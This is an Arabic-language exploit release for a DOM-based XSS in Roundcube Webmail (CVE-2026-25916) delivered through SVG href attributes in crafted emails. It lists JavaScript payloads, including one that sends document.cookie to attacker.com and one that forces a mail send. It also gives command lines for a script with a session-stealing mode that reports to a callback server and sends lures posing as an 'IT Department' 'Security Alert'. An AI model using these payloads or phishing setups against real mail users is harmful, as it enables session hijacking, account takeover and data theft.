
استغلال Python لثغرة XSS المستندة إلى DOM في Roundcube Webmail (CVE-2026-25916) عبر سمات href في SVG، مما يتيح اختطاف الجلسات وسرقة البيانات من خلال رسائل بريد إلكتروني مصممة بعناية.
عنوان الاستغلال: Roundcube Webmail DOM XSS عبر SVG href (CVE-2026-25916)
المؤلف: Mohammed Idrees Banyamer
التواصل: GitHub @mbanyamer | Instagram @banyamer_security
البلد: الأردن
التاريخ: 9 فبراير 2026
CVE: CVE-2026-25916
النوع: Cross-Site Scripting (XSS) قائم على DOM
المنصة: تطبيق ويب
تم اختباره على: Roundcube 1.6.8، Ubuntu 22.04
درجة CVSS: 6.1 (متوسطة)
⚠️ تحذير: هذا الاستغلال لأغراض تعليمية واختبارات مصرح بها فقط.
استخدمه فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
المؤلف غير مسؤول عن أي إساءة استخدام أو أنشطة غير قانونية.
تحتوي إصدارات Roundcube Webmail قبل 1.6.9 على ثغرة XSS قائمة على DOM في معالجة SVG. يفشل التطبيق في تعقيم سمات href و بشكل صحيح في عناصر SVG، مما يسمح بتنفيذ JavaScript عبر رسائل بريد إلكتروني مصممة خصيصًا.
xlink:hrefالإصدارات المتأثرة: Roundcube Webmail < 1.6.9
تم الإصلاح في: الإصدار 1.6.9 (Commit 26d7677)
CWE: CWE-79 - تحييد غير صحيح للمدخلات أثناء توليد صفحة الويب
ناقل الهجوم: عن بُعد عبر البريد الإلكتروني
التأثير: اختطاف الجلسة، الاستيلاء على الحساب، تسريب البيانات
توجد الثغرة في rcube_washtml.php حيث لم يتم التحقق من سمات href في عناصر SVG بشكل صحيح:
<!-- عناصر SVG المعرضة للخطر -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"